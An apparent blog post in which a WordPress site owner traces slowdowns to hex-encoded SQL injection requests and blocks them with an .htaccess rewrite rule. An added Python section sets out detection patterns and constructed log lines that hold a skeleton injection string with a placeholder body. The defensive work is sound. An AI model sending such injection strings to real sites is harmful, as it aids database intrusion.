Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice, to my knowledge, have tripped out.  I’ve been getting a MySQL error message like this when I try to resolve the problem in phpMyAdmin:

MySQL: ERROR 1040: Too many connections

I tried my host’s chat support (as I was in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result from the web: http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ and another from the horse’s mouth: http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t, because the server wasn’t responding.  When it finally fired back up after a quarter of an hour (!), I immediately disabled some OpenID plugins I’d been playing with on one site and checked that my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell) post addresses were extremely long, ending in what looked like code.  Like so (manually wrapped to fit into my theme):

http://strangelyperfect.tv/68/70s-mixer/?;DECLARE%20@S%20
[…hex-encoded payload, several hundred characters, omitted…]  (addendum: clickable link removed as I’m using this plugin now)

If you copy and paste the link and try it, it won’t work now (read on to see why ;-) ), but the correct link here does:

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page, which displayed normally with the long link showing in the browser address bar.  My suspicions were raised precisely because the page displayed okay.  This must be down to all the WordPress updating I’ve done: it was a couple of updates back that the thing had some SQL Injection resistance built in.  It appears to fail gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google.  There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and I found a neat fix, which I’ve implemented, here:

http://ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://ravenphpscripts.com/postp122652.html
RewriteEngine On
# Match a raw query string containing DECLARE, one or more %20 (encoded spaces), then @ (case-insensitive)
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
# Any request whose query string matched gets a 403 Forbidden and no further rules are processed
RewriteRule ^.* - [F,L]

This has done the trick.  Anything banging into my site with that in the query string is rejected.  I haven’t implemented a polite screen; it just gets the standard Forbidden response from my host, as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.
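To show what the rule above does and where it has a gap, here is an added example (not from the post or the ravenphpscripts thread) that mirrors the RewriteCond in Python, adds a broader check on the decoded query string, and scans constructed Apache log lines for the same request shape. The sample query strings and log lines are constructed; the hex body is a short placeholder, not the real payload.

```python
import re
from urllib.parse import unquote_plus

# Same pattern as the .htaccess RewriteCond: ^.+DECLARE(%20)+@ with [NC].
# Apache tests it against the raw, still percent-encoded query string.
HTACCESS_RULE = re.compile(r"^.+DECLARE(%20)+@", re.IGNORECASE)

# Broader check on the decoded query string: the skeleton these requests share,
# DECLARE @var CHAR(n) ... CAST(0x<hex> AS ..., however the spaces were encoded.
DECODED_RULE = re.compile(
    r"DECLARE\s+@\w+\s+(?:N?VAR)?CHAR\(\d+\).*?CAST\(0x[0-9a-f]+\s+AS",
    re.IGNORECASE | re.DOTALL,
)

def blocked_by_htaccess(query_string):
    """True if the post's RewriteCond would fire for this raw query string."""
    return HTACCESS_RULE.search(query_string) is not None

def looks_like_hex_sql_injection(query_string):
    """True if the decoded query string carries the DECLARE/CAST(0x...) skeleton."""
    return DECODED_RULE.search(unquote_plus(query_string)) is not None

# Apache combined-log prefix: client IP, ident, user, [timestamp], "METHOD target
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def scan_access_log(lines):
    """Return (client_ip, path) for log lines whose query string trips the decoded rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        path, _, qs = target.partition("?")
        if looks_like_hex_sql_injection(qs):
            hits.append((ip, path))
    return hits

# Constructed samples: 0x41424344 is a placeholder, not the payload from the post.
ENCODED_SPACES = ";DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x41424344%20AS%20CHAR(4000));EXEC(@S);"
PLUS_SPACES = ";DECLARE+@S+CHAR(4000);SET+@S=CAST(0x41424344+AS+CHAR(4000));EXEC(@S);"  # '+' spaces slip past the RewriteCond
BENIGN = "p=68&s=declare%20war%20on%20spam"  # a search containing the word "declare" is not blocked

# Constructed log lines (addresses and timestamps are made up; paths are the post's own).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jun/2008:10:01:02 +0100] "GET /68/70s-mixer/?' + ENCODED_SPACES + ' HTTP/1.1" 200 8123 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [24/Jun/2008:10:01:05 +0100] "GET /287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/?' + PLUS_SPACES + ' HTTP/1.1" 200 9000 "-" "Mozilla/4.0"',
    '192.0.2.4 - - [24/Jun/2008:10:02:00 +0100] "GET /68/70s-mixer/?' + BENIGN + ' HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path in scan_access_log(SAMPLE_LOG):
        print(f"hex-encoded SQL injection attempt from {ip} against {path}")
```

The second sample shows the gap: the RewriteCond only matches `%20`, so a request using `+` for spaces is not rejected, while the decoded check catches both.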

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway, so at a glance the browser address bar looked as if everything was okay!


© 2007-2014 Strangely Perfect All Rights Reserved